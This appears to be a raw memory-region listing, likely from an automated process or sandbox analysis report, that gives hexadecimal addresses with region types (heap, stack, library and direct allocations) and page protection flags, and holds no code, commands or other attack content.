|
page read and write
|
||
4EB000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
3AE8000
|
heap
|
page read and write
|
||
1AB08000
|
stack
|
page read and write
|
||
1B2000
|
trusted library allocation
|
page read and write
|
||
1B28E000
|
direct allocation
|
page read and write
|
||
5410000
|
heap
|
page read and write
|
||
39CF000
|
stack
|
page read and write
|
||
57FE000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
4954000
|
heap
|
page read and write
|
||
43B000
|
heap
|
page read and write
|
||
4777000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
478000
|
heap
|
page read and write
|
||
7FFFFF85000
|
trusted library allocation
|
page execute read
|
||
449C000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
2F4000
|
heap
|
page read and write
|
||
4054000
|
heap
|
page read and write
|
||
44DF000
|
heap
|
page read and write
|
||
25E6000
|
trusted library allocation
|
page read and write
|
||
27A5000
|
trusted library allocation
|
page read and write
|
||
405F000
|
heap
|
page read and write
|
||
43A6000
|
heap
|
page read and write
|
||
572C000
|
heap
|
page read and write
|
||
27AB000
|
trusted library allocation
|
page read and write
|
||
2E0000
|
heap
|
page read and write
|
||
255000
|
heap
|
page read and write
|
||
26F1000
|
trusted library allocation
|
page read and write
|
||
4096000
|
heap
|
page read and write
|
||
1CAEE000
|
stack
|
page read and write
|
||
1C80C000
|
stack
|
page read and write
|
||
1C244000
|
heap
|
page read and write
|
||
7FE8B302000
|
trusted library allocation
|
page read and write
|
||
1B460000
|
heap
|
page read and write
|
||
40C000
|
heap
|
page read and write
|
||
4C9000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
267000
|
heap
|
page read and write
|
||
7FE89A37000
|
trusted library allocation
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
1DC000
|
stack
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
288000
|
trusted library allocation
|
page read and write
|
||
97000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
495000
|
heap
|
page read and write
|
||
493B000
|
heap
|
page read and write
|
||
704000
|
heap
|
page read and write
|
||
39DD000
|
direct allocation
|
page read and write
|
||
4371000
|
heap
|
page read and write
|
||
3C0000
|
trusted library allocation
|
page execute and read and write
|
||
27B2000
|
trusted library allocation
|
page read and write
|
||
5690000
|
heap
|
page read and write
|
||
22E0000
|
trusted library allocation
|
page execute read
|
||
3AF0000
|
heap
|
page read and write
|
||
408D000
|
heap
|
page read and write
|
||
7FE8B415000
|
trusted library allocation
|
page read and write
|
||
3F51000
|
direct allocation
|
page read and write
|
||
1BB000
|
trusted library allocation
|
page execute and read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
3BA0000
|
trusted library allocation
|
page read and write
|
||
448F000
|
heap
|
page read and write
|
||
58DE000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
420000
|
direct allocation
|
page read and write
|
||
30CD000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
375C000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
4F0E000
|
stack
|
page read and write | page guard
|
||
1A2000
|
trusted library allocation
|
page read and write
|
||
1A5BC000
|
stack
|
page read and write
|
||
43C000
|
heap
|
page read and write
|
||
4030000
|
heap
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
130000
|
heap
|
page read and write
|
||
3619000
|
heap
|
page read and write
|
||
466000
|
heap
|
page read and write
|
||
270000
|
trusted library allocation
|
page read and write
|
||
1E70000
|
heap
|
page read and write
|
||
26ED000
|
trusted library allocation
|
page read and write
|
||
47A000
|
heap
|
page read and write
|
||
4AB000
|
unkown
|
page readonly
|
||
2E80000
|
heap
|
page read and write
|
||
445F000
|
heap
|
page read and write
|
||
2B7A000
|
trusted library allocation
|
page read and write
|
||
4038000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
1C89E000
|
stack
|
page read and write
|
||
495000
|
heap
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
7FE8B310000
|
trusted library allocation
|
page execute and read and write
|
||
2B70000
|
trusted library allocation
|
page read and write
|
||
4062000
|
heap
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
7FE89A70000
|
trusted library allocation
|
page execute and read and write
|
||
405F000
|
heap
|
page read and write
|
||
500000
|
heap
|
page read and write
|
||
3D0000
|
trusted library allocation
|
page read and write
|
||
5BF000
|
heap
|
page read and write
|
||
4537000
|
heap
|
page read and write
|
||
2EAD000
|
direct allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
438000
|
trusted library allocation
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
360C000
|
heap
|
page read and write
|
||
330000
|
heap
|
page read and write
|
||
455A000
|
heap
|
page read and write
|
||
3128000
|
heap
|
page read and write
|
||
590000
|
direct allocation
|
page read and write
|
||
27D5000
|
trusted library allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
55B000
|
heap
|
page read and write
|
||
2645000
|
trusted library allocation
|
page read and write
|
||
27AE000
|
trusted library allocation
|
page read and write
|
||
3F0000
|
heap
|
page read and write
|
||
3463000
|
direct allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
495A000
|
heap
|
page read and write
|
||
41C0000
|
heap
|
page read and write
|
||
4933000
|
heap
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
490000
|
heap
|
page read and write
|
||
4944000
|
heap
|
page read and write
|
||
1A8F9000
|
stack
|
page read and write
|
||
3B6B000
|
heap
|
page read and write
|
||
27B2000
|
trusted library allocation
|
page read and write
|
||
3BF4000
|
direct allocation
|
page read and write
|
||
4915000
|
heap
|
page read and write
|
||
40A4000
|
heap
|
page read and write
|
||
3FC0000
|
direct allocation
|
page read and write
|
||
267000
|
heap
|
page read and write
|
||
1C300000
|
heap
|
page read and write
|
||
6C0000
|
heap
|
page read and write
|
||
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
7FE89B75000
|
trusted library allocation
|
page read and write
|
||
2680000
|
remote allocation
|
page read and write
|
||
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
4779000
|
heap
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
3430000
|
direct allocation
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
4936000
|
heap
|
page read and write
|
||
4542000
|
heap
|
page read and write
|
||
308000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
1C48E000
|
stack
|
page read and write
|
||
2F40000
|
heap
|
page read and write
|
||
27AD000
|
trusted library allocation
|
page read and write
|
||
470000
|
heap
|
page read and write
|
||
1DE3000
|
direct allocation
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
455A000
|
heap
|
page read and write
|
||
2CF000
|
heap
|
page read and write
|
||
1D10000
|
trusted library allocation
|
page read and write
|
||
4DA000
|
heap
|
page read and write
|
||
411C000
|
heap
|
page read and write
|
||
4370000
|
heap
|
page read and write
|
||
7FE89A80000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
3B6D000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
3AF000
|
heap
|
page read and write
|
||
4546000
|
heap
|
page read and write
|
||
1A4FE000
|
heap
|
page execute and read and write
|
||
3E50000
|
heap
|
page read and write
|
||
4A5D000
|
stack
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
4370000
|
heap
|
page read and write
|
||
51FE000
|
stack
|
page read and write
|
||
23E8000
|
trusted library allocation
|
page read and write
|
||
2700000
|
trusted library allocation
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
338000
|
heap
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
268D000
|
trusted library allocation
|
page read and write
|
||
42E0000
|
heap
|
page read and write
|
||
7FE89883000
|
trusted library allocation
|
page execute and read and write
|
||
39B0000
|
heap
|
page read and write
|
||
317E000
|
trusted library allocation
|
page read and write
|
||
4058000
|
heap
|
page read and write
|
||
37E000
|
heap
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
543E000
|
stack
|
page read and write
|
||
1B1BF000
|
stack
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
27B4000
|
trusted library allocation
|
page read and write
|
||
439A000
|
heap
|
page read and write
|
||
24000
|
heap
|
page read and write
|
||
430000
|
trusted library allocation
|
page read and write
|
||
134000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
409000
|
heap
|
page read and write
|
||
405F000
|
heap
|
page read and write
|
||
3BE0000
|
direct allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
577C000
|
heap
|
page read and write
|
||
4B6000
|
heap
|
page read and write
|
||
2C0000
|
heap
|
page read and write
|
||
4B6000
|
heap
|
page read and write
|
||
36E000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
27A5000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
4918000
|
heap
|
page read and write
|
||
378E000
|
heap
|
page read and write
|
||
2491000
|
trusted library allocation
|
page read and write
|
||
4348000
|
heap
|
page read and write
|
||
493F000
|
stack
|
page read and write
|
||
2B7A000
|
trusted library allocation
|
page read and write
|
||
492000
|
heap
|
page read and write
|
||
2DF000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
660000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
408000
|
heap
|
page read and write
|
||
36A0000
|
trusted library allocation
|
page read and write
|
||
2F9000
|
heap
|
page read and write
|
||
420F000
|
heap
|
page read and write
|
||
43A2000
|
heap
|
page read and write
|
||
56F0000
|
heap
|
page read and write
|
||
1A489000
|
stack
|
page read and write
|
||
3E50000
|
direct allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
4484000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
25B000
|
heap
|
page read and write
|
||
4AB0000
|
heap
|
page execute and read and write
|
||
44DF000
|
heap
|
page read and write
|
||
24D1000
|
trusted library allocation
|
page read and write
|
||
3B5C000
|
heap
|
page read and write
|
||
476B000
|
heap
|
page read and write
|
||
374A000
|
heap
|
page read and write
|
||
1B0CF000
|
stack
|
page read and write
|
||
497000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
59FE000
|
stack
|
page read and write
|
||
2B45000
|
trusted library allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
3A0000
|
heap
|
page execute and read and write
|
||
20000
|
heap
|
page read and write
|
||
1C10E000
|
stack
|
page read and write
|
||
3029000
|
trusted library allocation
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
420B000
|
heap
|
page read and write
|
||
54EE000
|
stack
|
page read and write
|
||
5D0E000
|
stack
|
page read and write
|
||
3BE0000
|
direct allocation
|
page read and write
|
||
4946000
|
heap
|
page read and write
|
||
2DF000
|
stack
|
page read and write
|
||
58A3000
|
heap
|
page read and write
|
||
4309000
|
heap
|
page read and write
|
||
27C8000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
38D000
|
direct allocation
|
page read and write
|
||
26EC000
|
stack
|
page read and write
|
||
1A5C6000
|
heap
|
page read and write
|
||
1B030000
|
heap
|
page read and write
|
||
37B6000
|
heap
|
page read and write
|
||
3598000
|
heap
|
page read and write
|
||
3900000
|
direct allocation
|
page read and write
|
||
4F0F000
|
stack
|
page read and write
|
||
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
25E9000
|
trusted library allocation
|
page read and write
|
||
409000
|
heap
|
page read and write
|
||
26C4000
|
trusted library allocation
|
page read and write
|
||
387000
|
direct allocation
|
page read and write
|
||
313E000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
2DD0000
|
direct allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
2B74000
|
trusted library allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
3BA0000
|
trusted library allocation
|
page read and write
|
||
2837000
|
trusted library allocation
|
page read and write
|
||
3053000
|
trusted library allocation
|
page read and write
|
||
40A9000
|
heap
|
page read and write
|
||
25B5000
|
heap
|
page read and write
|
||
4946000
|
heap
|
page read and write
|
||
196000
|
heap
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
3745000
|
heap
|
page read and write
|
||
44DA000
|
heap
|
page read and write
|
||
5100000
|
heap
|
page read and write
|
||
516000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
7FE89A84000
|
trusted library allocation
|
page read and write
|
||
7FE89930000
|
trusted library allocation
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
44DF000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
2F0000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
CDE000
|
stack
|
page read and write
|
||
411A000
|
heap
|
page read and write
|
||
3AF0000
|
direct allocation
|
page read and write
|
||
427000
|
heap
|
page read and write
|
||
3751000
|
heap
|
page read and write
|
||
4165000
|
heap
|
page read and write
|
||
25EE000
|
trusted library allocation
|
page read and write
|
||
469000
|
heap
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
2B43000
|
trusted library allocation
|
page read and write
|
||
5770000
|
heap
|
page read and write
|
||
4F68000
|
heap
|
page read and write
|
||
124D6000
|
trusted library allocation
|
page read and write
|
||
499F000
|
stack
|
page read and write
|
||
4370000
|
heap
|
page read and write
|
||
1C20B000
|
heap
|
page read and write
|
||
235F000
|
stack
|
page read and write
|
||
4A4000
|
heap
|
page read and write
|
||
7FE8B2D3000
|
trusted library allocation
|
page read and write
|
||
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
39B000
|
direct allocation
|
page read and write
|
||
408C000
|
heap
|
page read and write
|
||
3BE0000
|
direct allocation
|
page read and write
|
||
433000
|
heap
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
43AC000
|
heap
|
page read and write
|
||
2B73000
|
trusted library allocation
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
50D000
|
stack
|
page read and write
|
||
3155000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3F0000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
4043000
|
heap
|
page read and write
|
||
379000
|
heap
|
page read and write
|
||
24FF000
|
trusted library allocation
|
page read and write
|
||
4098000
|
heap
|
page read and write
|
||
56EE000
|
heap
|
page read and write
|
||
1AC58000
|
heap
|
page read and write
|
||
2454000
|
trusted library allocation
|
page read and write
|
||
30B6000
|
heap
|
page read and write
|
||
2B45000
|
trusted library allocation
|
page read and write
|
||
427000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
960000
|
heap
|
page read and write
|
||
4B10000
|
heap
|
page execute and read and write
|
||
1AE7C000
|
stack
|
page read and write
|
||
2B47000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
7FE8B3B0000
|
trusted library allocation
|
page read and write
|
||
41BA000
|
heap
|
page read and write
|
||
4770000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
6A6000
|
heap
|
page read and write
|
||
24AE000
|
trusted library allocation
|
page read and write
|
||
34F0000
|
trusted library allocation
|
page read and write
|
||
1A625000
|
heap
|
page read and write
|
||
2421000
|
trusted library allocation
|
page read and write
|
||
1BFFD000
|
stack
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
33DD000
|
trusted library allocation
|
page read and write
|
||
375C000
|
heap
|
page read and write
|
||
27B3000
|
trusted library allocation
|
page read and write
|
||
7FE8B460000
|
trusted library allocation
|
page read and write
|
||
4941000
|
heap
|
page read and write
|
||
2A4B000
|
stack
|
page read and write
|
||
39DD000
|
direct allocation
|
page read and write
|
||
382D000
|
heap
|
page read and write
|
||
4331000
|
heap
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
5793000
|
heap
|
page read and write
|
||
40A1000
|
heap
|
page read and write
|
||
25EB000
|
heap
|
page read and write
|
||
3AE8000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
4F3D000
|
stack
|
page read and write
|
||
D4000
|
heap
|
page read and write
|
||
342A000
|
trusted library allocation
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
3140000
|
trusted library allocation
|
page read and write
|
||
4910000
|
heap
|
page read and write
|
||
4371000
|
heap
|
page read and write
|
||
4062000
|
heap
|
page read and write
|
||
7FE89C30000
|
trusted library allocation
|
page read and write
|
||
3457000
|
direct allocation
|
page read and write
|
||
4919000
|
heap
|
page read and write
|
||
2606000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
4347000
|
heap
|
page read and write
|
||
37B6000
|
heap
|
page read and write
|
||
3131000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
440000
|
direct allocation
|
page read and write
|
||
4095000
|
heap
|
page read and write
|
||
495A000
|
heap
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
44E0000
|
trusted library allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
3F40000
|
direct allocation
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
7FE89BE4000
|
trusted library allocation
|
page read and write
|
||
405F000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
1DD7000
|
direct allocation
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
26D2000
|
trusted library allocation
|
page read and write
|
||
4E35000
|
heap
|
page read and write
|
||
5CBE000
|
stack
|
page read and write
|
||
41C0000
|
heap
|
page read and write
|
||
411A000
|
heap
|
page read and write
|
||
420000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
124D8000
|
trusted library allocation
|
page read and write
|
||
539000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
1C26D000
|
heap
|
page read and write
|
||
24F1000
|
trusted library allocation
|
page read and write
|
||
327E000
|
stack
|
page read and write
|
||
3598000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
43A3000
|
heap
|
page read and write
|
||
1C211000
|
heap
|
page read and write
|
||
3157000
|
trusted library allocation
|
page read and write
|
||
495000
|
heap
|
page read and write
|
||
7FE8B380000
|
trusted library allocation
|
page read and write
|
||
4038000
|
heap
|
page read and write
|
||
315D000
|
trusted library allocation
|
page read and write
|
||
4775000
|
heap
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
3361000
|
trusted library allocation
|
page read and write
|
||
46A000
|
heap
|
page read and write
|
||
370000
|
direct allocation
|
page read and write
|
||
433000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
124EE000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
24C3000
|
trusted library allocation
|
page read and write
|
||
478000
|
heap
|
page read and write
|
||
3F54000
|
direct allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
1C264000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
3D6000
|
heap
|
page read and write
|
||
23EB000
|
trusted library allocation
|
page read and write
|
||
43F6000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
40A1000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
37B6000
|
heap
|
page read and write
|
||
1C0000
|
heap
|
page read and write
|
||
306F000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
409F000
|
heap
|
page read and write
|
||
448B000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
2D000
|
heap
|
page read and write
|
||
3BA0000
|
trusted library allocation
|
page read and write
|
||
554000
|
heap
|
page read and write
|
||
405F000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
40A000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
2B69000
|
trusted library allocation
|
page read and write
|
||
6AD000
|
stack
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
385000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
1B41B000
|
heap
|
page read and write
|
||
7FE8B130000
|
trusted library allocation
|
page read and write
|
||
524000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
2B49000
|
trusted library allocation
|
page read and write
|
||
476D000
|
heap
|
page read and write
|
||
27A1000
|
trusted library allocation
|
page read and write
|
||
454B000
|
heap
|
page read and write
|
||
381B000
|
heap
|
page read and write
|
||
43AB000
|
heap
|
page read and write
|
||
255B000
|
trusted library allocation
|
page read and write
|
||
1D40000
|
trusted library allocation
|
page read and write
|
||
88F000
|
stack
|
page read and write
|
||
2FA5000
|
trusted library allocation
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
2EAA000
|
direct allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
404C000
|
heap
|
page read and write
|
||
2EF0000
|
heap
|
page read and write
|
||
495A000
|
heap
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
4054000
|
heap
|
page read and write
|
||
483000
|
heap
|
page read and write
|
||
55B000
|
heap
|
page read and write
|
||
1C640000
|
heap
|
page read and write
|
||
46F000
|
heap
|
page read and write
|
||
410000
|
heap
|
page read and write
|
||
397F000
|
stack
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
20DB000
|
heap
|
page read and write
|
||
57FE000
|
stack
|
page read and write
|
||
121000
|
heap
|
page read and write
|
||
56D7000
|
heap
|
page read and write
|
||
33C0000
|
trusted library allocation
|
page read and write
|
||
413000
|
system
|
page execute and read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
27D5000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
4348000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
4B6000
|
heap
|
page read and write
|
||
560000
|
trusted library allocation
|
page execute and read and write
|
||
7FE89C40000
|
trusted library allocation
|
page read and write
|
||
3F51000
|
direct allocation
|
page read and write
|
||
27D5000
|
trusted library allocation
|
page read and write
|
||
4990000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
4909000
|
heap
|
page read and write
|
||
4546000
|
heap
|
page read and write
|
||
598E000
|
stack
|
page read and write
|
||
43A6000
|
heap
|
page read and write
|
||
3AF0000
|
direct allocation
|
page read and write
|
||
48A000
|
heap
|
page read and write
|
||
312F000
|
heap
|
page read and write
|
||
4701000
|
heap
|
page read and write
|
||
4972000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
449C000
|
heap
|
page read and write
|
||
1A659000
|
heap
|
page read and write
|
||
276E000
|
trusted library allocation
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
39B000
|
heap
|
page read and write
|
||
57E000
|
heap
|
page read and write
|
||
25B000
|
heap
|
page read and write
|
||
3BE000
|
stack
|
page read and write
|
||
44D6000
|
heap
|
page read and write
|
||
2B52000
|
trusted library allocation
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
2134000
|
heap
|
page read and write
|
||
2EAD000
|
direct allocation
|
page read and write
|
||
44D6000
|
heap
|
page read and write
|
||
254000
|
heap
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
1A659000
|
stack
|
page read and write
|
||
20A0000
|
heap
|
page read and write
|
||
7FE8B370000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
4B6000
|
heap
|
page read and write
|
||
3072000
|
heap
|
page read and write
|
||
17F000
|
trusted library allocation
|
page read and write
|
||
2B4E000
|
trusted library allocation
|
page read and write
|
||
2380000
|
heap
|
page read and write
|
||
1DD7000
|
direct allocation
|
page read and write
|
||
7FE8B2DC000
|
trusted library allocation
|
page read and write
|
||
5425000
|
heap
|
page read and write
|
||
439A000
|
heap
|
page read and write
|
||
7FE8B3A0000
|
trusted library allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
2556000
|
trusted library allocation
|
page read and write
|
||
2685000
|
trusted library allocation
|
page read and write
|
||
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
5741000
|
heap
|
page read and write
|
||
4370000
|
heap
|
page read and write
|
||
4E4000
|
heap
|
page read and write
|
||
160000
|
trusted library allocation
|
page read and write
|
||
3B00000
|
direct allocation
|
page read and write
|
||
B3000
|
stack
|
page read and write
|
||
2B72000
|
trusted library allocation
|
page read and write
|
||
4435000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
2B77000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
4054000
|
heap
|
page read and write
|
||
1A4C8000
|
heap
|
page execute and read and write
|
||
526E000
|
stack
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
180000
|
trusted library allocation
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
5868000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
594000
|
heap
|
page read and write
|
||
2384000
|
heap
|
page read and write
|
||
2EAD000
|
direct allocation
|
page read and write
|
||
27B2000
|
trusted library allocation
|
page read and write
|
||
5758000
|
heap
|
page read and write
|
||
313E000
|
heap
|
page read and write
|
||
4919000
|
heap
|
page read and write
|
||
37B6000
|
heap
|
page read and write
|
||
12431000
|
trusted library allocation
|
page read and write
|
||
372B000
|
stack
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
4062000
|
heap
|
page read and write
|
||
592E000
|
stack
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
18D000
|
trusted library allocation
|
page execute and read and write
|
||
4BE000
|
heap
|
page read and write
|
||
7FE8B140000
|
trusted library allocation
|
page read and write
|
||
2604000
|
trusted library allocation
|
page read and write
|
||
27AB000
|
trusted library allocation
|
page read and write
|
||
411A000
|
heap
|
page read and write
|
||
3B69000
|
heap
|
page read and write
|
||
358A000
|
stack
|
page read and write
|
||
37AE000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
3A8000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
495A000
|
heap
|
page read and write
|
||
4B6000
|
heap
|
page read and write
|
||
4331000
|
heap
|
page read and write
|
||
497000
|
heap
|
page read and write
|
||
17D000
|
trusted library allocation
|
page execute and read and write
|
||
361D000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
4058000
|
heap
|
page read and write
|
||
CE000
|
heap
|
page read and write
|
||
140000
|
trusted library allocation
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
361B000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
3072000
|
heap
|
page read and write
|
||
620000
|
direct allocation
|
page read and write
|
||
3128000
|
heap
|
page read and write
|
||
1246D000
|
trusted library allocation
|
page read and write
|
||
378E000
|
heap
|
page read and write
|
||
600000
|
direct allocation
|
page read and write
|
||
557000
|
heap
|
page read and write
|
||
4484000
|
heap
|
page read and write
|
||
27D5000
|
trusted library allocation
|
page read and write
|
||
40AB000
|
heap
|
page read and write
|
||
27D5000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
2B52000
|
trusted library allocation
|
page read and write
|
||
3753000
|
heap
|
page read and write
|
||
3450000
|
direct allocation
|
page read and write
|
||
48DD000
|
stack
|
page read and write
|
||
273000
|
trusted library allocation
|
page execute and read and write
|
||
381C000
|
heap
|
page read and write
|
||
56E2000
|
heap
|
page read and write
|
||
2B4D000
|
trusted library allocation
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
3BF4000
|
direct allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
57F2000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
890000
|
trusted library allocation
|
page execute and read and write
|
||
